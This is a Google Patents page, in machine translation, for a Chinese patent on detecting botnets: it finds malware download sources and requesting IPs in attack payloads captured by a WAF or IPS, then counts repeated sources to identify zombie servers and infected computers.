CN104796386B - Botnet detection method, device and system - Google Patents
Botnet detection method, device and system Download PDFInfo
- Publication number
- CN104796386B CN104796386B CN201410027082.9A CN201410027082A CN104796386B CN 104796386 B CN104796386 B CN 104796386B CN 201410027082 A CN201410027082 A CN 201410027082A CN 104796386 B CN104796386 B CN 104796386B
- Authority
- CN
- China
- Prior art keywords
- data
- attack behavior
- behavior data
- source
- source address
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Abstract
The invention is suitable for the field of computer network security, and provides a botnet detection method, a device and a system, wherein the method comprises the following steps: acquiring attack behavior data captured at a network node; analyzing the attack behavior data, and acquiring effective load payload data included in the attack behavior data; searching a source address of malicious program downloading and a source IP for sending a downloading request, wherein the source address of the malicious program downloading is included in the payload data; and determining the computers in the botnet according to the source address and the source IP. Compared with the prior art in a name matching mode, the botnet detection method can effectively avoid the phenomenon of false alarm and missing report and effectively improve the detection accuracy.
Description
Technical Field
The invention belongs to the field of computer network security, and particularly relates to a botnet detection method, device and system.
Background
Botnets refer to the use of one or more propagation means to infect a large number of hosts into a bot, thereby forming a one-to-many control network between a controller and the infected host, referred to as bots, and the hosts controlling these bots are referred to as bots servers.
With the increase of network bandwidth and the improvement of hardware performance of computers and network equipment, the botnet propagation speed is faster and faster, and the activity is rampant. The botnet forms an attack platform, and various attack behaviors such as denial of service attack, sending of junk mails, secret stealing, resource abuse, botnet mine digging and the like can be effectively launched by utilizing the platform, so that the whole basic information network or an important application system can be paralyzed, a large amount of secret or personal privacy is leaked, or other illegal criminal activities such as network fraud are carried out, and the harmfulness is extremely serious.
In order to effectively detect the botnet and further reduce the harm caused by the botnet, a user name nickname is generally used for botnet detection in the prior art, but the nickname rule needs to be counted and found, so that the phenomenon of missing report or false report can occur, and the detection accuracy is not high.
Disclosure of Invention
The embodiment of the invention aims to provide a botnet detection method, which is used for solving the problems that in the prior art, when a user name nickname is used for detecting a botnet, the phenomenon of missing report or false report is easy to occur, and the detection accuracy is low.
The embodiment of the invention is realized in such a way that a botnet detection method comprises the following steps:
acquiring attack behavior data captured at a network node;
analyzing the attack behavior data, and acquiring effective load payload data included in the attack behavior data, wherein the effective load payload data is a code part for realizing malicious actions in the attack behavior data;
searching a source address of malicious program downloading and a source IP for sending a downloading request, wherein the source address of the malicious program downloading is included in the payload data;
and determining the computers in the botnet according to the source address and the source IP.
Another object of an embodiment of the present invention is to provide a botnet detection apparatus, including:
the data receiving unit is used for acquiring attack behavior data captured at a network node;
the analysis acquisition unit is used for analyzing the attack behavior data and acquiring effective load payload data included in the attack behavior data, wherein the effective load payload data is a code part for realizing malicious actions in the attack behavior data;
the searching unit is used for searching a source address of malicious program downloading and a source IP for sending a downloading request, wherein the source address of the malicious program downloading is included in the payload data;
a determining unit for determining a computer in the botnet according to the source address and the source IP.
The embodiment of the invention also provides a detection system of the botnet, which comprises data capture devices arranged at each node position in the detected network and data analysis servers connected with the data capture devices, wherein the data capture devices are used for acquiring attack behavior data transmitted at network nodes, the data analysis servers are used for receiving the attack behavior data captured by the data capture devices at each node position, acquiring effective load payload data included in the attack behavior data, searching a source address for malicious program downloading and a source IP for sending a downloading request according to the effective load payload data, and determining a computer in the botnet according to the source address and the source IP.
In the embodiment of the invention, the effective load included in the attack behavior data is obtained by obtaining the attack behavior data captured at the network node, the source address of malicious program downloading and the IP for sending the downloading request included in the effective load are searched, and the computer in the botnet is determined according to the source address and the source IP. According to the behavior characteristics of the botnet in propagation, the attack behavior data is captured from the network node and the source address of malicious program downloading and the source IP for sending the downloading request in the payload are searched, so that the computer in the botnet is effectively determined.
Drawings
Fig. 1 is a flowchart of an implementation of a botnet detection method according to a first embodiment of the present invention;
FIG. 2 is a flowchart of an implementation of a botnet detection method according to a second embodiment of the present invention;
fig. 3 is a schematic structural diagram of a botnet detection system according to a third embodiment of the present invention;
fig. 4 is a schematic structural diagram of a botnet detection system according to a third embodiment of the present invention applied to network detection;
fig. 5 is a block diagram illustrating a detecting apparatus for botnets according to a fourth embodiment of the present invention;
fig. 6 is a schematic structural diagram of an apparatus according to a fifth embodiment of the present invention.
Detailed Description
In order to make the objects, technical solutions and advantages of the present invention more apparent, the present invention is described in further detail below with reference to the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative of the invention and are not intended to limit the invention.
When WEB applications are more and more abundant, the WEB server gradually becomes a main attack target with strong computing power, processing performance and high implied value, such as injection attack, information leakage, weak password attack and the like. Among them, attacks on servers by many computers controlled through botnets are also a common form of attack.
In order to find the botnet in time so as to find the affected computer, a method for detecting the botnet by using a user name nickname is commonly used at present, because the name (nickname) of a so-called user added into a botnet server is generated by a botnet (bot) program, the nickname of the bots should accord with a certain generation algorithm and have certain regularity, for example, an IP address expression method is that a three-bit abbreviation of a country where an IP address of a host infected with the bot program is located is put at the beginning, and then random numbers with specified lengths, such as USA |8028032, CHA |8920340, are added at the back; the system representation is that the system of the host infected with the bot program is used as the initial letter, such as xp, 2000, etc., and then a random number of a specified length, such as xp |8034, 2000|80956) is added later. These named features can be found and summarized from the resulting bot source code. The regularity of the nicknames of the users is different from the randomness of the normal nicknames of irc users, so that irc botnets in the network can be judged by matching feature characters with the nicknames in http data features. However, the nickname rule in the method needs to be statistically found, so that the phenomenon of missing report or false report may occur, and the detection accuracy is not high.
In order to rapidly and effectively analyze and detect the botnet, the detection method of the botnet comprises the following steps: acquiring attack behavior data captured at a network node; analyzing the attack behavior data, and acquiring effective load payload data included in the attack behavior data, wherein the effective load payload data is a code part for realizing malicious actions in the attack behavior data; searching a source address of malicious program downloading and a source IP for sending a downloading request, wherein the source address of the malicious program downloading is included in the payload data; and determining the computers in the botnet according to the source address and the source IP.
According to the behavior characteristics of the botnet in propagation, the attack behavior data is captured from the network node and the source address of malicious program downloading and the source IP for sending the downloading request in the payload are searched, so that the computer in the botnet is effectively determined.
The first embodiment is as follows:
fig. 1 shows an implementation flow of the botnet detection method provided by the first embodiment of the present invention, which is detailed as follows:
in step S101, attack behavior data captured at a network node is acquired.
Specifically, the attack behavior data captured at the network node may be captured by a Web application firewall WAF System provided at the network node, by the WAF System, or by an active Intrusion Prevention System (IPS for short, english is collectively referred to as Intrusion Prevention System).
The intrusion prevention system IPS is a security device of a computer network, and is a supplement to antivirus software (antivirus programs) and a firewall (Packet Filter, Application Gateway). The intrusion prevention system IPS is a computer network security device capable of monitoring network data transmission behaviors of a network or network devices, and can immediately interrupt, adjust or isolate abnormal or harmful network data transmission behaviors.
The Web application firewall WAF is all called English: unlike a traditional Firewall, the WAF works in an Application layer and detects and protects HTTP requests and responses flowing through based on known attack characteristic rules. From a functional framework perspective, the WAF includes a protection engine and attack signature rules.
The specific protection process of the network system architecture applying the WAF is as follows: when an HTTP request exists on the Internet and needs to access a Web server at the back end, firstly, the HTTP request is forwarded by a router and protected by a traditional firewall to reach a WAF, a protection engine of the WAF scans the received HTTP request by using the rule, when attack behavior data are found, the attack behavior data are captured, and the attack behavior data can be processed by adopting various modes such as interception, abandoning, disconnection and the like, and the request processed by the WAF finally reaches the Web server corresponding to the HTTP request in a server group. Of course, the WAF may also receive requests from the intranet and perform the protection as described above.
The attack behavior data may specifically be all contents of the request, or may of course be only a data code portion including the attack behavior data for implementing a malicious behavior.
In step S102, the attack behavior data is analyzed, and payload data included in the attack behavior data is obtained, where the payload data is a code portion that implements a malicious action in the attack behavior data.
Trojan horse viruses, or other virus malicious programs, often do some harmful or malignant action. For example, the Trojan horse virus attracts a user to download and execute by disguising the Trojan horse virus, provides a door for opening an aesthetic Trojan horse dibber computer for a Trojan horse applicator, and enables the Trojan horse applicator to arbitrarily destroy and steal files of a Trojan horse to be planted and even remotely control the computer of the Trojan horse to be planted. And other viruses such as worm viruses destroy files in the computer by continuously copying the functions of the viruses to other computers. The portion of code that implements these malicious actions in the above-described attack behavior data is called the payload. Different viruses specifically perform different malicious actions, and thus payload can do anything that a program running in the victim's environment can do, such as destroying files, deleting files, sending sensitive information to the author or any recipient of the virus, and providing backdoors to infected computers.
Since viruses generally consist of two parts: the system comprises a payload and an obfuscation component, wherein the payload is code used for executing malicious actions, and the obfuscation component is used for protecting a virus from being killed.
In order to effectively analyze the malicious action, the steps of extracting the data of the payload included in the virus, analyzing the attack behavior data, and acquiring the payload data included in the attack behavior data may specifically be:
comparing the attack behavior data with the keywords of the predefined malicious action execution code, and judging whether the keywords of the predefined malicious action execution code are included in the attack behavior data;
and if the keywords of the predefined malicious action execution code are included, determining that the line or the statement where the keywords of the malicious action execution code are located is payload data.
The predefined malicious action execution code keyword can be obtained from a latest virus keyword library included in the virus library, or can be defined by a user as required.
In step S103, a source address of the malware download included in the payload data and a source IP from which the download request is sent are searched.
Currently, the most common propagation and expansion of botnets are based on the IRC (Internet relay chat, chinese) protocol, and the application layer protocol provides a server of the IRC and a chat channel to perform mutual real-time conversation. The IRC protocol adopts a C/S mode of a client/server, so that the client can be connected to the IRC server, users can establish or select to join in interested channels, and each user can send messages to all other users in the channels or can send messages to a certain user independently. The channel administrator may set the channel properties such as setting a password, setting the channel to a hidden mode.
An attacker writes an own IRC bot, which only supports part of IRC commands and interprets and executes received messages as commands. After an attacker writes a bot program and establishes an IRC server of the attacker, the attacker can implant the bot program into a user computer in different modes, such as: the method comprises the steps of actively spreading by a worm, directly invading a computer by using system bugs, deceiving a user to download and execute a bot program by using social engineering, using a DCC command of an IRC protocol through an electronic mail or an instant chat tool, directly spreading by using an IRC server, and embedding malicious codes in a webpage to wait for the user to browse.
When the bot runs on the infected computer, it connects to the specific IRC server with a random Nickname and built-in password and joins the specified channel. The attacker logs in the channel at any time and sends an authentication message, and immediately sends a control instruction to the active bot program (or the temporarily inactive bot program) after the authentication is passed. The zombie computer reads all messages sent to the channel or the title of the channel and executes immediately if it is an instruction recognizable by an attacker who has passed the authentication.
Typically these instructions involve updating a bot, transferring or downloading specified files, remotely controlling a connection, launching a denial of service attack, opening a proxy server, and so forth.
Along with the wide-range rapid propagation of botnet programs, attackers gradually link originally unrelated computers, and the attackers are connected to a designated IRC server through preset instructions of the botnet programs to receive the control of the attackers to form a huge network system, namely the formation of the botnet. And then more and more secret extended intrusion behaviors are initiated by the platform.
Therefore, in the development process of botnets, malicious programs such as bots, trojans and the like need to be continuously downloaded from bots servers, so that more computers are infected.
The step of searching for a source address of malicious program downloading and a source IP sending a downloading request included in the payload data may specifically include:
comparing payload data with predefined download keywords, and searching for the payload data to include the download keywords;
and determining a source address of malicious program downloading and a source IP for sending a downloading request corresponding to the downloading keyword according to the downloading keyword searched in the payload data.
Of course, the method for searching payload data and the source address of the malicious program download and the source IP sending the download request in step S102 and step S103 through the keyword is only one of the preferred embodiments, and it can be understood by those skilled in the art that a method such as a program structure analysis method may also be used to search corresponding data.
In step S104, the computers in the botnet are determined from the source address and the source IP.
According to the propagation characteristics of the botnet, a botnet computer which is sent out by a malicious program downloading request through attack behavior data included in the effective load is different from the request of a general computer user. When a source address downloaded by a malicious program and a source IP for sending a download request (for example, a download link immediately following the download request and a request source IP for requesting to download the malicious program) included in the payload data are acquired, addresses of a zombie computer and a zombie server in a zombie network can be correspondingly acquired according to the source address information and the source IP address information.
According to the embodiment of the invention, the effective load included in the attack behavior data is obtained by obtaining the attack behavior data captured at the network node, the source address of malicious program downloading and the IP for sending the downloading request included in the effective load are searched, and the computer in the botnet is determined according to the source address and the source IP. According to the behavior characteristics of the botnet in propagation, the attack behavior data is captured from the network node and the source address of malicious program downloading and the source IP for sending the downloading request in the payload are searched, so that the computer in the botnet is effectively determined.
Example two:
fig. 2 shows an implementation flow of the botnet detection method provided by the second embodiment of the present invention, which is detailed as follows:
in step S201, attack behavior data captured at a network node is acquired.
In step S202, the attack behavior data is analyzed, and payload data included in the attack behavior data is obtained, where the payload data is a code portion that implements a malicious action in the attack behavior data.
In step S203, a source address of the malware download included in the payload data and a source IP from which the download request is sent are searched.
In step S204, in the payload data, it is determined whether the number of occurrences of the same malicious program download source address sent by different computers is greater than a predetermined number of occurrences.
Under a specific condition, a user may mistakenly trigger a download request for a malicious program, for example, a download request for a malicious program that is touched by a user clicking some illegal websites, and in this case, a computer that mistakenly triggers the download request for the malicious program may be judged mistakenly.
In order to avoid such a situation, in step S204 in the embodiment of the present invention, the number of times that the same malicious program download source address sent in the payload appears is counted, and if the number of times is greater than the predetermined number of times, the determination is performed in step S205, otherwise, the determination may be temporarily not performed on the computer corresponding to the download request source and the computer corresponding to the malicious program download source address.
Furthermore, in order to avoid sending multiple download requests by the same computer, different computers need to be distinguished during the statistics of the download requests, so that more effective statistical data can be obtained.
In step S205, if the number of times that the same malicious program download source address sent by different computers appears is greater than the predetermined number of times, the host corresponding to the malicious program download source address is determined as a zombie server, and the computer corresponding to the source IP that sends the corresponding download request is determined as a zombie computer.
When the times of occurrence of the same malicious program downloading source address sent by different computers are larger than the preset times, the malicious programs downloaded in the attack request payloads from a plurality of different sources point to the same downloading source, and the attack is considered to be botnet attack behavior. The attack source, i.e., the source that sent the corresponding download request, is identified as the compromised zombie computer; and the downloading source, namely the host corresponding to the malicious program downloading source address, is judged to be a zombie network node or a zombie server.
Compared with the first embodiment, the method and the device for judging the botnet have the advantages that the step of judging whether the times of the same malicious program download source addresses sent by different computers are larger than the preset times is added in the condition of judging the botnet, so that the situation of misjudgment caused by user mistriggering when the botnet is judged can be avoided, and the detection accuracy is further improved.
Example three:
fig. 3 shows a schematic structural diagram of a botnet detection system according to a third embodiment of the present invention, which is detailed as follows:
the detection system of the botnet comprises data capture devices arranged at each node position in the detected network and data analysis servers connected with the data capture devices, wherein the data capture devices are used for acquiring attack behavior data transmitted at network nodes, the data analysis servers are used for receiving the attack behavior data captured by the data capture devices at each node position, acquiring effective load payload data included in the attack behavior data, searching a source address for malicious program downloading and a source IP for sending a downloading request according to the effective load payload data, and determining a computer in the botnet according to the source address and the source IP.
In fig. 3, the network node may be part of a main core switch node, or other important data switching device, for forwarding or switching data between computers connected thereto.
The data capturing device may be a WAF system disposed at a network node, and of course, other data filters may be used to filter the required data, and the WAF system in fig. 3 is only one preferred embodiment.
The data analysis server is used for connecting each data analysis device, analyzing the attack behavior data obtained by the data analysis device, obtaining effective load payload data included in the attack behavior data, searching a source address of malicious program downloading included in the effective load payload data and a source IP for sending a downloading request, and accordingly correspondingly determining a computer in the botnet.
The data analysis server is further specifically configured to determine, in the payload data, whether the number of occurrences of the same malicious program download source address sent by different computers is greater than a predetermined number of times; if the times of occurrence of the same malicious program downloading source address sent by different computers are larger than the preset times, the host corresponding to the malicious program downloading source address is determined as a zombie server, and the computer corresponding to the source IP sending the corresponding downloading request is determined as a zombie computer.
The data analysis server in the embodiment of the present invention may further include a plurality of data analysis servers distributed or integrated at the respective network node locations, or may be sent to the same independent data analysis server by the respective network nodes.
Fig. 4 is an application schematic diagram of a botnet detection system according to a third embodiment of the present invention, in which a botnet server controls a plurality of botnet computers, that is, the attack source 1 and the attack source N in fig. 3, and sends attack behavior data including viruses to a service machine through routing forwarding of a core switch, and after the service machine is attacked, the service machine executes corresponding operations to download malicious programs such as trojans, so that the botnet server can control the attacked service machine. The core switch of the embodiment of the invention bypasses a Web application firewall WAF system, and the WAF system captures attack behavior data and collects the behavior data to a data analysis server for data analysis.
The system of the embodiment of the invention corresponds to the method of the first embodiment and the second embodiment, and the source address downloaded by the malicious program and the source IP for sending the download request in the payload are found by capturing the attack behavior data from the network node, so that the computer in the botnet is effectively determined.
Example four:
fig. 5 shows a block diagram of a detecting apparatus for botnets according to a fourth embodiment of the present invention, which is detailed as follows:
the detection device of the botnet in the embodiment of the invention comprises:
a data receiving unit 501, configured to acquire attack behavior data captured at a network node;
an analysis obtaining unit 502, configured to analyze the attack behavior data, and obtain payload data included in the attack behavior data, where the payload data is a code portion for implementing a malicious action in the attack behavior data;
a searching unit 503, configured to search for a source address of malicious program downloading included in the payload data and a source IP for sending a downloading request;
a determining unit 504, configured to determine a computer in the botnet according to the source address and the source IP.
Further, the data receiving unit 501 is specifically configured to receive attack behavior data captured by a network node, where the attack behavior data is attack behavior data captured by a Web application firewall WAF system or an intrusion prevention system IPS that is disposed at the network node.
Further, the parsing obtaining unit 502 includes:
the first comparison subunit is configured to compare the attack behavior data with a predefined keyword of a malicious action execution code, and determine whether the attack behavior data includes the predefined keyword of the malicious action execution code;
and the effective load determining subunit is used for determining that a line or a statement containing the malicious action execution code keyword is effective load payload data if the predefined malicious action execution code keyword is contained.
Further, the determining unit 504 includes:
a judging subunit, configured to judge, in the payload data, whether the number of occurrences of the same malicious program download source address sent by different computers is greater than a predetermined number of times;
and if the times of occurrence of the same malicious program download source address sent by different computers are greater than the preset times, the host corresponding to the malicious program download source address is determined as a zombie server, and the computer corresponding to the source IP sending the corresponding download request is determined as a zombie computer.
The search unit 503 further includes:
the second comparison subunit is used for comparing the payload data with predefined downloading keywords and searching for downloading keywords contained in the payload data;
and the address determining subunit is configured to determine, according to the download keyword found in the payload data, a source address of malicious program download corresponding to the download keyword and a source IP for sending the download request.
The detection device of the botnet according to the embodiment of the present invention corresponds to the detection method of the botnet according to the first to third embodiments, and will not be described herein repeatedly.
Example five:
fig. 6 is a block diagram of a terminal according to a fifth embodiment of the present invention, where fig. 6 is a block diagram of a terminal according to a fourth embodiment of the present invention, where the terminal according to this embodiment includes: memory 620, network module 670, processor 680, and power supply 690. Those skilled in the art will appreciate that the terminal structure shown in fig. 6 is not intended to be limiting and may include more or fewer components than those shown, or some components may be combined, or a different arrangement of components.
The following describes each constituent element of the terminal in detail with reference to fig. 6:
the memory 620 may be used to store software programs and modules, and the processor 680 may execute various functional applications of the terminal and data processing by operating the software programs and modules stored in the memory 620. The memory 620 may mainly include a storage program area and a storage data area, wherein the storage program area may store an operating system, an application program required by at least one function (such as a sound playing function, an image playing function, etc.), and the like; the storage data area may store data (such as audio data, a phonebook, etc.) created according to the use of the terminal, etc. Further, the memory 620 may include high speed random access memory, and may also include non-volatile memory, such as at least one magnetic disk storage device, flash memory device, or other volatile solid state storage device.
The network module 670 may include a wireless fidelity (WiFi) module, a wired network module or a radio frequency module, wherein the WiFi module belongs to a short-distance wireless transmission technology, and the terminal may help the user to send and receive e-mails, browse webpages, access streaming media, etc. through the network module 670, which provides the user with wireless broadband internet access. Although fig. 6 shows the network module 670, it is understood that it does not belong to the essential constitution of the terminal, and may be omitted entirely as needed within the scope not changing the essence of the invention.
The processor 680 is a control center of the terminal, connects various parts of the entire terminal using various interfaces and lines, and performs various functions of the terminal and processes data by operating or executing software programs and/or modules stored in the memory 620 and calling data stored in the memory 620, thereby integrally monitoring the terminal. Optionally, processor 680 may include one or more processing units; preferably, the processor 680 may integrate an application processor, which mainly handles operating systems, user interfaces, application programs, etc., and a modem processor, which mainly handles wireless communications. It will be appreciated that the modem processor described above may not be integrated into processor 680.
The terminal also includes a power supply 690 (e.g., a battery) for powering the various components, which may be preferably logically coupled to the processor 680 via a power management system to manage charging, discharging, and power consumption via the power management system.
Although not shown, the terminal may further include an input device, a display device, an audio circuit, a camera, a bluetooth module, and the like, which are not described herein again.
In the embodiment of the present invention, the processor 680 included in the terminal further has the following functions: a method of performing botnet detection, comprising:
acquiring attack behavior data captured at a network node;
analyzing the attack behavior data, and acquiring effective load payload data included in the attack behavior data, wherein the effective load payload data is a code part for realizing malicious actions in the attack behavior data;
searching a source address of malicious program downloading and a source IP for sending a downloading request, wherein the source address of the malicious program downloading is included in the payload data;
and determining the computers in the botnet according to the source address and the source IP.
The above description is only for the purpose of illustrating the preferred embodiments of the present invention and is not to be construed as limiting the invention, and any modifications, equivalents and improvements made within the spirit and principle of the present invention are intended to be included within the scope of the present invention.
Claims (12)
1. A botnet detection method, the method comprising:
acquiring attack behavior data captured at a network node;
analyzing the attack behavior data, and acquiring effective load payload data included in the attack behavior data, wherein the effective load payload data is a code part for realizing malicious actions in the attack behavior data;
comparing the payload data with predefined download keywords, and searching for the download keywords included in the payload data;
according to the downloading keywords searched in the payload data, determining a source address of malicious program downloading and a source IP for sending a downloading request, which correspond to the downloading keywords;
and determining the computers in the botnet according to the source address and the source IP.
2. The method according to claim 1, wherein the step of obtaining attack behavior data captured at the network node specifically comprises:
receiving attack behavior data captured by a network node, wherein the attack behavior data is the attack behavior data captured by a Web Application Firewall (WAF) system or an Intrusion Prevention System (IPS) arranged at the network node.
3. The method of claim 1, wherein the parsing the attack behavior data and obtaining payload data included in the attack behavior data comprises:
comparing the attack behavior data with the keywords of the predefined malicious action execution code, and judging whether the keywords of the predefined malicious action execution code are included in the attack behavior data;
and if the keywords of the predefined malicious action execution code are included, determining that the line or the statement where the keywords of the malicious action execution code are located is payload data.
4. The method of claim 1, wherein the determining the computers in the botnet based on the source address and the source IP is specifically:
judging whether the times of the same malicious program downloading source addresses sent by different computers are greater than the preset times or not in the payload data;
if the times of occurrence of the same malicious program downloading source address sent by different computers are larger than the preset times, the host corresponding to the malicious program downloading source address is determined as a zombie server, and the computer corresponding to the source IP sending the corresponding downloading request is determined as a zombie computer.
5. A botnet detection apparatus, the apparatus comprising:
the data receiving unit is used for acquiring attack behavior data captured at a network node;
the analysis acquisition unit is used for analyzing the attack behavior data and acquiring effective load payload data included in the attack behavior data, wherein the effective load payload data is a code part for realizing malicious actions in the attack behavior data;
a searching unit, configured to search for a source address of malicious program downloading and a source IP for sending a downloading request included in the payload data, where the searching unit includes: a second comparing subunit, configured to compare the payload data with a predefined download keyword, and search for the download keyword included in the payload data; an address determining subunit, configured to determine, according to a download keyword found in the payload data, a source address of malicious program download corresponding to the download keyword and a source IP for sending a download request;
a determining unit for determining a computer in the botnet according to the source address and the source IP.
6. The apparatus according to claim 5, wherein the data receiving unit is specifically configured to receive attack behavior data captured by a network node, where the attack behavior data is captured by a Web Application Firewall (WAF) system or an Intrusion Prevention System (IPS) provided at the network node.
7. The apparatus of claim 5, wherein the parsing obtaining unit comprises:
the first comparison subunit is configured to compare the attack behavior data with a predefined keyword of a malicious action execution code, and determine whether the attack behavior data includes the predefined keyword of the malicious action execution code;
and the effective load determining subunit is used for determining that a line or a statement containing the malicious action execution code keyword is effective load payload data if the predefined malicious action execution code keyword is contained.
8. The apparatus of claim 5, wherein the determining unit comprises:
a judging subunit, configured to judge, in the payload data, whether the number of occurrences of the same malicious program download source address sent by different computers is greater than a predetermined number of times;
and if the times of occurrence of the same malicious program download source address sent by different computers are greater than the preset times, the host corresponding to the malicious program download source address is determined as a zombie server, and the computer corresponding to the source IP sending the corresponding download request is determined as a zombie computer.
9. The botnet detection system is characterized by comprising data capture devices arranged at each node position in a detected network and data analysis servers connected with the data capture devices, wherein the data capture devices are used for acquiring attack behavior data transmitted at network nodes, and the data analysis servers are used for receiving the attack behavior data captured by the data capture devices at each node position, acquiring effective load payload data included in the attack behavior data, comparing the effective load payload data with predefined download keywords, and searching the download keywords included in the effective load payload data; according to the downloading keywords searched in the payload data, determining a source address of malicious program downloading corresponding to the downloading keywords and a source IP for sending a downloading request, and determining a computer in the botnet according to the source address and the source IP.
10. The system of claim 9, wherein the data capture device is a Web Application Firewall (WAF) system disposed at the network node.
11. The system according to claim 9, wherein the data analysis server is specifically configured to determine whether the number of occurrences of the same malicious program download source address sent by different computers is greater than a predetermined number of times in the payload data; if the times of occurrence of the same malicious program downloading source address sent by different computers are larger than the preset times, the host corresponding to the malicious program downloading source address is determined as a zombie server, and the computer corresponding to the source IP sending the corresponding downloading request is determined as a zombie computer.
12. A computer-readable storage medium, on which a computer program is stored which, when being executed by a processor, carries out the steps of the botnet detection method according to any one of claims 1-4.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201410027082.9A CN104796386B (en) | 2014-01-21 | 2014-01-21 | Botnet detection method, device and system |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201410027082.9A CN104796386B (en) | 2014-01-21 | 2014-01-21 | Botnet detection method, device and system |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN104796386A CN104796386A (en) | 2015-07-22 |
| CN104796386B true CN104796386B (en) | 2020-02-11 |
Family
ID=53560899
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201410027082.9A Active CN104796386B (en) | 2014-01-21 | 2014-01-21 | Botnet detection method, device and system |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN104796386B (en) |
Families Citing this family (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN107342967B (en) * | 2016-05-03 | 2020-07-31 | 安碁资讯股份有限公司 | Botnet detection system and method thereof |
| CN110119858A (en) * | 2018-02-05 | 2019-08-13 | 南京易司拓电力科技股份有限公司 | The Data Quality Assessment Methodology of automation system for the power network dispatching based on big data |
| CN109150871B (en) * | 2018-08-14 | 2021-02-19 | 创新先进技术有限公司 | Security detection method and device, electronic equipment and computer readable storage medium |
| CN110430199B (en) * | 2019-08-08 | 2021-11-05 | 杭州安恒信息技术股份有限公司 | Method and system for identifying internet of things botnet attack source |
Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101360019A (en) * | 2008-09-18 | 2009-02-04 | 华为技术有限公司 | Detection method, system and apparatus of zombie network |
| CN101404658A (en) * | 2008-10-31 | 2009-04-08 | 北京锐安科技有限公司 | Method and system for detecting bot network |
| CN101588276A (en) * | 2009-06-29 | 2009-11-25 | 成都市华为赛门铁克科技有限公司 | A kind of method and device thereof that detects Botnet |
| CN101714931A (en) * | 2009-11-26 | 2010-05-26 | 成都市华为赛门铁克科技有限公司 | Early warning method, device and system of unknown malicious code |
-
2014
- 2014-01-21 CN CN201410027082.9A patent/CN104796386B/en active Active
Patent Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101360019A (en) * | 2008-09-18 | 2009-02-04 | 华为技术有限公司 | Detection method, system and apparatus of zombie network |
| CN101404658A (en) * | 2008-10-31 | 2009-04-08 | 北京锐安科技有限公司 | Method and system for detecting bot network |
| CN101588276A (en) * | 2009-06-29 | 2009-11-25 | 成都市华为赛门铁克科技有限公司 | A kind of method and device thereof that detects Botnet |
| CN101714931A (en) * | 2009-11-26 | 2010-05-26 | 成都市华为赛门铁克科技有限公司 | Early warning method, device and system of unknown malicious code |
Also Published As
| Publication number | Publication date |
|---|---|
| CN104796386A (en) | 2015-07-22 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN107888607B (en) | Network threat detection method and device and network management equipment | |
| US10354072B2 (en) | System and method for detection of malicious hypertext transfer protocol chains | |
| US10095866B2 (en) | System and method for threat risk scoring of security threats | |
| KR101554809B1 (en) | System and method for protocol fingerprinting and reputation correlation | |
| Ghafir et al. | A survey on botnet command and control traffic detection | |
| KR100973076B1 (en) | System for depending against distributed denial of service attack and method therefor | |
| EP3374870A1 (en) | System and method for threat risk scoring of security threats | |
| CN104796386B (en) | Botnet detection method, device and system | |
| Anwar et al. | Android botnets: a serious threat to android devices. | |
| US9787711B2 (en) | Enabling custom countermeasures from a security device | |
| Zhao et al. | A review on IoT botnet | |
| Xie et al. | HoneyIM: Fast detection and suppression of instant messaging malware in enterprise-like networks | |
| CN114301647A (en) | Prediction defense method, device and system for vulnerability information in situation awareness | |
| Al-Hammadi | Behavioural correlation for malicious bot detection | |
| Affinito et al. | The evolution of Mirai botnet scans over a six-year period | |
| CN114928564A (en) | Function verification method and device of security component | |
| Tang et al. | Concept, characteristics and defending mechanism of worms | |
| Mudgerikar et al. | Iot attacks and malware | |
| JP6635029B2 (en) | Information processing apparatus, information processing system, and communication history analysis method | |
| Xie et al. | Secure instant messaging in enterprise-like networks | |
| Singh et al. | Detection and prevention of non-PC botnets | |
| Kebande et al. | Botnet’s obfuscated C&C infrastructure take-down approaches based on monitoring centralized Zeus bot variant’s propagation model | |
| Xiang et al. | Botnet spoofing: fighting botnet with itself | |
| ZHANG et al. | 5-2 A Holistic Perspective on Understanding and Breaking Botnets: Challenges and Countermeasures | |
| Ilavarasan et al. | A Survey on host-based Botnet identification |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |